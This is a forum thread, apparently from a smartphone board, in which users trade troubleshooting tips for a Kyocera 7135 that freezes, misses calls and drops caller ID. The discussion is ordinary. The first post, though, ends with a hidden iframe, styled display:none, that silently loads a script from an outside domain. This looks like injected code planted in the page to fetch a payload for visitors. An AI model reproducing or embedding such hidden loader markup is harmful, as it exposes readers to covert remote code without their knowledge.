+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User
    Join Date
    10-16-2002
    Posts
    19

    7135 frequently unresponsive

    My first full day with the thing. So far I am not impressed.

    It frequently has "brain freeze" moments where all the buttons and taps become unresponsive for up to 30 seconds. Usually they will cue up and then execute all in a row.

    I'm also having problems with the ring -- it stopped ringing. I'm using one of the stock ringtones. When I go in to choose a ringtone, it no longer previews it.

    Any thoughts? Maybe I just got a dud.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User KLiuLess's Avatar
    Join Date
    11-15-2001
    Posts
    847
    This can happen with certain apps. Not sure if that the problem w/yours. Do you notice the delay when you're doing a certain action with the phone?

    With the sound, did you check your settings?

  3. #3
    Registered User
    Join Date
    10-03-2002
    Posts
    38

    Unresponsive to answer a call

    I am glad to see this thread. Although I am now too busy to even PLAY with the phone, I have a major frustration and glance thru the board when I can to see if I am alone on this.

    FYI - I use the phone on Verizon, bought in mid-January from getconnected.

    Often the phone will ring and I will not be able to answer the call. I do not have to be using the palm side, the phone can be in my purse, the ringer blaring and when I open the flip I am unable to get out of the Palm side and answer the call.

    Often it will ring 6-7 times, stop ringing as if they went to VM and then start again. Usually at that point I can grab the call b/c the phone side of the phone has materialized.

    I have to say, this is incredibly aggravating in a phone billed as Phone First, PDA Second. This NEVER happened on my 6035.... and it makes me want to go back to two separate machines (since I cannot ever go back to monotone on the Palm side again on the 6035!)

    Anyone else get this?

    (And what's up with the Caller ID situation - I am now getting Caller ID less than 30% of the time! Egads.)

    milonguera in chicago

  4. #4
    Registered User
    Join Date
    10-16-2002
    Posts
    19
    Originally posted by KLiuLess
    This can happen with certain apps. Not sure if that the problem w/yours. Do you notice the delay when you're doing a certain action with the phone?
    Doesn't seem specific to any one app (I don't use anything fancy or 3rd party ... yet)

    With the sound, did you check your settings?
    Yes. As I said, I was in the settings trying to choose a ring tone (it's not set to vibrate).

    I powered off and on again and now it's working. I'll try to be more scientific about the delay thing now that I know it's not just me.

  5. #5
    Registered User
    Join Date
    03-20-2002
    Posts
    74
    I've noticed mine is often unresponsive when my signal strength goes from weak to non-existent or vice versa. I'm probably a couple of days from returning mine, as Verizon's service in the area I am in the most is pathetic. I'm very disappointed, as I've played with it just enough to really like the Palm part of the phone, but if I can't make or receive calls, or be heard, then the whole thing is kind of pointless.

    Can you hear me now? Uh, no, not really
    The 7135 is a marathon, not a Sprint

  6. #6
    Registered User
    Join Date
    03-07-2002
    Posts
    983
    "unable to get out of Palm side to answer call".

    You can set your phone prefs so that opening the flip answers the call.

  7. #7
    CBCP, PMP jsimonson0's Avatar
    Join Date
    08-21-2003
    Location
    Chicago, IL
    Posts
    400
    I've noticed that if it thinks it doesn't have a signal, it'll "freeze" until the signal search times out or until it registers a signal again. Check the signal bars the next time this happens. Anything less than 2 bars or an analog-only signal might do this to you...

  8. #8
    Registered User
    Join Date
    06-24-2002
    Posts
    47
    I have also experienced the unresponsiveness. Mostly when I am trying to dial a number, and of course, once the keys begin to register (several at a time), the number is completely wrong and I need to start again.

    I also have noticed that (ah, cool!! there goes the taxi!!!!) this phone has much more difficulty finding a strong Verizon signal than my 6035 did despite the constant *228s that I've been doing to correct it.

    All in all though, this is FAR better than the 603.

  9. #9
    Registered User
    Join Date
    10-03-2002
    Posts
    38
    Good advice to me - to answer opening the flip. Although you might think me insane for not preferring that method.

    So I decided to try it. Luckily someone also decided to call me! Same thing - No answer, kind of stuck in limbo land, ringing and ringing -- then it "catches", stops ringing as if going to VM, then starts again and I can answer.

    This does not happen EVERY time, but I am thinking it happens about 50% of the time.

    ALSO - more often than that I cannot get the phone to mute when it is ringing and I press the side down button. It used to work perfectly, but now it rings and rings even though I repeatedly depress the button.

    These are small issues, but I have most of them with the phone - which is making it more and more unreliable for me. Especially when combined with the lack of Caller Id. I do run a business off my cell phone line.... so dependability is important to me.

    Any thoughts?

  10. #10
    Registered User
    Join Date
    04-14-2003
    Posts
    2
    milonguera, you said your phone was from getconnected, perhaps it is older software?

    i suggest swapping it with Kyocera as a warranty issue. it sounds a lot like a software problem. check with your local vzw to see if they have warranty replacements yet, thought i doubt they do.

    as an example, the motorola 720 was incredibly buggy until motorola provided new software for it now everyone is happy with the phone. all sorts of problems can arise such as slow response to input, blacked out screens, missed calls.

    i just got mine in the mail a couple of days ago, and overall I am pleased.

    I was disappointed, however, to see that the 7135 has the same sluggish key response as the 6035 did. I am not getting errors in entry though.

    g'luck

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts